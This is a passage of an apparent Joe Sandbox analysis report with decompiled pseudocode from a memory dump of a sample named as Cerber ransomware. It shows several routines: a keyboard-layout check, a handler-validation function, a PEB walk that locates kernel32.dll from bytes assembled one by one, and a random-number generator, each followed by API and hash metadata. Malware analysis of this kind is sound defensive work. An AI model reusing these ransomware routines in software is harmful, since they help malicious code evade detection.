                                                                                                                                                                                        						}
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						_t42 = _t42 & 0xffffff00 | _v5 == 0x00000000;
                                                                                                                                                                                        						E00405463(_t51);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E00405463(_v16);
                                                                                                                                                                                        				return _t42;
                                                                                                                                                                                        			}





















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00408098
                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004080B9
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: KeyboardLayoutList$lstrcmpi
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 573063762-0
                                                                                                                                                                                        • Opcode ID: a31f32d06f7e17ee4ea3a7eba88b6ffe2109cd580622e4985b4ba3a89efae58a
                                                                                                                                                                                        • Instruction ID: 40abcbf1954c938740b17a7287912662274c305781500c71ab9ee89658897ea9
                                                                                                                                                                                        • Opcode Fuzzy Hash: a31f32d06f7e17ee4ea3a7eba88b6ffe2109cd580622e4985b4ba3a89efae58a
                                                                                                                                                                                        • Instruction Fuzzy Hash: CD315832D00625ABD7206BB58D01B8FBBA49F44710F06817FE8907B3C2DE7D8D098AD8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040B8D1(long _a4) {
                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				short* _v32;
                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				void _t80;
                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                        				short* _t87;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                                        				long _t91;
                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                        				long _t108;
                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                                                        				_v8 =  *[fs:0x8];
                                                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                                                        						_t91 = 0;
                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                                                        								L20:
                                                                                                                                                                                        								_t63 = 0;
                                                                                                                                                                                        								L60:
                                                                                                                                                                                        								return _t63;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L9:
                                                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                        							L15:
                                                                                                                                                                                        							_t81 =  *0x430c60;
                                                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                        							_t58 = 0;
                                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                                                        								L18:
                                                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                                                        									L59:
                                                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                                                        									goto L60;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                        										L46:
                                                                                                                                                                                        										_t63 = 1;
                                                                                                                                                                                        										 *0x430ca8 = 1;
                                                                                                                                                                                        										__eflags =  *0x430ca8;
                                                                                                                                                                                        										if( *0x430ca8 != 0) {
                                                                                                                                                                                        											goto L60;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t84 =  *0x430c60;
                                                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                                                        											L51:
                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                                                        												L58:
                                                                                                                                                                                        												 *0x430ca8 = 0;
                                                                                                                                                                                        												goto L5;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t94 = 0;
                                                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                                                        												L56:
                                                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                                                        													 *0x430c60 = _t86;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												do {
                                                                                                                                                                                        													_t68 = 0x430c68 + _t94 * 4;
                                                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                                                        													_t110 =  *_t68;
                                                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                                                        												goto L56;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t69 = 0x430c64 + _t84 * 4;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                                                        												goto L51;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L51;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L51;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								L16:
                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
                                                                                                                                                                                        								if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *0x430ca8 = 1;
                                                                                                                                                                                        							__eflags =  *0x430ca8;
                                                                                                                                                                                        							if( *0x430ca8 != 0) {
                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
                                                                                                                                                                                        							if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
                                                                                                                                                                                        								L32:
                                                                                                                                                                                        								_t100 = 0;
                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                                                        									L34:
                                                                                                                                                                                        									 *0x430ca8 = 0;
                                                                                                                                                                                        									goto L5;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									L33:
                                                                                                                                                                                        									_t90 = 0x430c68 + _t100 * 4;
                                                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                                                        								goto L34;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t58 = _t81 - 1;
                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                                                        								L28:
                                                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                                                        									 *0x430c60 = _t81;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t58 = _t81 - 1;
                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								L25:
                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
                                                                                                                                                                                        								if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                        									goto L34;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L28;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                        					goto L60;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x0040b926
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040b928
                                                                                                                                                                                        0x0040b92a
                                                                                                                                                                                        0x0040b990
                                                                                                                                                                                        0x0040b990
                                                                                                                                                                                        0x0040baee
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040baee
                                                                                                                                                                                        0x0040b92c
                                                                                                                                                                                        0x0040b92c
                                                                                                                                                                                        0x0040b930
                                                                                                                                                                                        0x0040b932
                                                                                                                                                                                        0x0040b932
                                                                                                                                                                                        0x0040b932
                                                                                                                                                                                        0x0040b932
                                                                                                                                                                                        0x0040b935
                                                                                                                                                                                        0x0040b936
                                                                                                                                                                                        0x0040b939
                                                                                                                                                                                        0x0040b939
                                                                                                                                                                                        0x0040b93d
                                                                                                                                                                                        0x0040b941
                                                                                                                                                                                        0x0040b94f
                                                                                                                                                                                        0x0040b94f
                                                                                                                                                                                        0x0040b957
                                                                                                                                                                                        0x0040b95d
                                                                                                                                                                                        0x0040b95f
                                                                                                                                                                                        0x0040b961
                                                                                                                                                                                        0x0040b971
                                                                                                                                                                                        0x0040b97e
                                                                                                                                                                                        0x0040b982
                                                                                                                                                                                        0x0040b987
                                                                                                                                                                                        0x0040b989
                                                                                                                                                                                        0x0040ba07
                                                                                                                                                                                        0x0040ba07
                                                                                                                                                                                        0x0040b98b
                                                                                                                                                                                        0x0040b98b
                                                                                                                                                                                        0x0040b98b
                                                                                                                                                                                        0x0040ba09
                                                                                                                                                                                        0x0040ba0b
                                                                                                                                                                                        0x0040baec
                                                                                                                                                                                        0x0040baec
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba11
                                                                                                                                                                                        0x0040ba11
                                                                                                                                                                                        0x0040ba18
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba1e
                                                                                                                                                                                        0x0040ba22
                                                                                                                                                                                        0x0040ba7e
                                                                                                                                                                                        0x0040ba80
                                                                                                                                                                                        0x0040ba88
                                                                                                                                                                                        0x0040ba8a
                                                                                                                                                                                        0x0040ba8c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba8e
                                                                                                                                                                                        0x0040ba94
                                                                                                                                                                                        0x0040ba96
                                                                                                                                                                                        0x0040ba98
                                                                                                                                                                                        0x0040baad
                                                                                                                                                                                        0x0040baad
                                                                                                                                                                                        0x0040baaf
                                                                                                                                                                                        0x0040bade
                                                                                                                                                                                        0x0040bae5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040bae5
                                                                                                                                                                                        0x0040bab3
                                                                                                                                                                                        0x0040bab4
                                                                                                                                                                                        0x0040bab6
                                                                                                                                                                                        0x0040bab8
                                                                                                                                                                                        0x0040bab8
                                                                                                                                                                                        0x0040baba
                                                                                                                                                                                        0x0040babc
                                                                                                                                                                                        0x0040babe
                                                                                                                                                                                        0x0040bad2
                                                                                                                                                                                        0x0040bad2
                                                                                                                                                                                        0x0040bad5
                                                                                                                                                                                        0x0040bad7
                                                                                                                                                                                        0x0040bad7
                                                                                                                                                                                        0x0040bad8
                                                                                                                                                                                        0x0040bad8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040bac0
                                                                                                                                                                                        0x0040bac0
                                                                                                                                                                                        0x0040bac0
                                                                                                                                                                                        0x0040bac9
                                                                                                                                                                                        0x0040baca
                                                                                                                                                                                        0x0040bacc
                                                                                                                                                                                        0x0040bace
                                                                                                                                                                                        0x0040bace
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040bac0
                                                                                                                                                                                        0x0040babe
                                                                                                                                                                                        0x0040ba9a
                                                                                                                                                                                        0x0040baa1
                                                                                                                                                                                        0x0040baa1
                                                                                                                                                                                        0x0040baa3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040baa5
                                                                                                                                                                                        0x0040baa6
                                                                                                                                                                                        0x0040baa9
                                                                                                                                                                                        0x0040baab
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040baab
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040baa1
                                                                                                                                                                                        0x0040ba24
                                                                                                                                                                                        0x0040ba27
                                                                                                                                                                                        0x0040ba2c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba35
                                                                                                                                                                                        0x0040ba37
                                                                                                                                                                                        0x0040ba3d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba43
                                                                                                                                                                                        0x0040ba49
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba4f
                                                                                                                                                                                        0x0040ba51
                                                                                                                                                                                        0x0040ba5a
                                                                                                                                                                                        0x0040ba5e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba64
                                                                                                                                                                                        0x0040ba67
                                                                                                                                                                                        0x0040ba69
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba70
                                                                                                                                                                                        0x0040ba72
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040ba74
                                                                                                                                                                                        0x0040ba78

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 0040B982
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                                                        • Opcode ID: bc0c46430afbcb94b073af8471c25a4b8e1a340d107eb079e8a445015ed2ee3d
                                                                                                                                                                                        • Instruction ID: 4e5d44d476c35f123473bd712ff1369b58b65a6bdf80106f154212dd927b4b1a
                                                                                                                                                                                        • Opcode Fuzzy Hash: bc0c46430afbcb94b073af8471c25a4b8e1a340d107eb079e8a445015ed2ee3d
                                                                                                                                                                                        • Instruction Fuzzy Hash: B361A0717006069BDB29CF29C89466B73A5EB85314F28963BD956E73D0E738DC42CACC
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00404FE6() {
                                                                                                                                                                                        				short _v8;
                                                                                                                                                                                        				short _v10;
                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                        				short _v14;
                                                                                                                                                                                        				short _v16;
                                                                                                                                                                                        				short _v18;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				short _v22;
                                                                                                                                                                                        				short _v24;
                                                                                                                                                                                        				short _v26;
                                                                                                                                                                                        				short _v28;
                                                                                                                                                                                        				short _v30;
                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                        				short _t22;
                                                                                                                                                                                        				short _t23;
                                                                                                                                                                                        				short _t24;
                                                                                                                                                                                        				short _t25;
                                                                                                                                                                                        				short _t26;
                                                                                                                                                                                        				short _t27;
                                                                                                                                                                                        				short _t28;
                                                                                                                                                                                        				short _t29;
                                                                                                                                                                                        				short _t30;
                                                                                                                                                                                        				short _t31;
                                                                                                                                                                                        				short _t32;
                                                                                                                                                                                        				short _t37;
                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t39 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                                                                                                                                                                        				_t22 = 0x6b;
                                                                                                                                                                                        				_v32 = _t22;
                                                                                                                                                                                        				_t23 = 0x65;
                                                                                                                                                                                        				_v30 = _t23;
                                                                                                                                                                                        				_t24 = 0x72;
                                                                                                                                                                                        				_v28 = _t24;
                                                                                                                                                                                        				_t25 = 0x6e;
                                                                                                                                                                                        				_v26 = _t25;
                                                                                                                                                                                        				_t26 = 0x65;
                                                                                                                                                                                        				_v24 = _t26;
                                                                                                                                                                                        				_t27 = 0x6c;
                                                                                                                                                                                        				_v22 = _t27;
                                                                                                                                                                                        				_t28 = 0x33;
                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                        				_t29 = 0x32;
                                                                                                                                                                                        				_v18 = _t29;
                                                                                                                                                                                        				_t30 = 0x2e;
                                                                                                                                                                                        				_v16 = _t30;
                                                                                                                                                                                        				_t31 = 0x64;
                                                                                                                                                                                        				_v14 = _t31;
                                                                                                                                                                                        				_t32 = 0x6c;
                                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                                        				_v12 = _t32;
                                                                                                                                                                                        				_v10 = _t32;
                                                                                                                                                                                        				_t40 = _t39;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				while(E00404FA1( &_v32,  *((intOrPtr*)(_t40 + 0x30))) != 0) {
                                                                                                                                                                                        					_t40 =  *_t40;
                                                                                                                                                                                        					if( *((intOrPtr*)(_t40 + 0x18)) != _t37) {
                                                                                                                                                                                        						if(_t40 != _t39) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t37 =  *((intOrPtr*)(_t40 + 0x18));
                                                                                                                                                                                        				goto L6;
                                                                                                                                                                                        			}































                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 5d2d5cea87e672d897b79a4ae1888bd816b1e59c6d49eb7d22e91c5833e09a7d
                                                                                                                                                                                        • Instruction ID: e0e335c2d1d0d48a37a74387565101e4d2a41a94e88aaabf3f36e5f1bcccdbc9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d2d5cea87e672d897b79a4ae1888bd816b1e59c6d49eb7d22e91c5833e09a7d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B118636A54749AAEB10CFD49851BBFB375EF40B20F20541BD640EB2E0D2B65E40C799
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E004063E1(signed int __eax) {
                                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                        				unsigned int _t24;
                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t29 = __eax;
                                                                                                                                                                                        				if(__eax != 0) {
                                                                                                                                                                                        					_t8 =  *0x42f67c; // 0xdba5d41c
                                                                                                                                                                                        					if(_t8 == 0x12345678) {
                                                                                                                                                                                        						asm("rdtsc");
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t24 =  *0x42f678; // 0xe5623597
                                                                                                                                                                                        					_t9 =  *0x42f670; // 0x118108b0
                                                                                                                                                                                        					 *0x42f67c = _t9;
                                                                                                                                                                                        					_t10 =  *0x42f674; // 0x7a7d59b0
                                                                                                                                                                                        					 *0x42f670 = _t10;
                                                                                                                                                                                        					_t16 = (_t24 >> 0x0000000b ^ _t8 << 0x0000000b ^ _t8) >> 0x00000008 ^ _t24 ^ _t8 << 0x0000000b ^ _t8;
                                                                                                                                                                                        					 *0x42f674 = _t24;
                                                                                                                                                                                        					 *0x42f678 = _t16;
                                                                                                                                                                                        					_t23 = 0x64;
                                                                                                                                                                                        					return _t16 % _t29 * 0x64 / _t23;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					return __eax;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}











                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
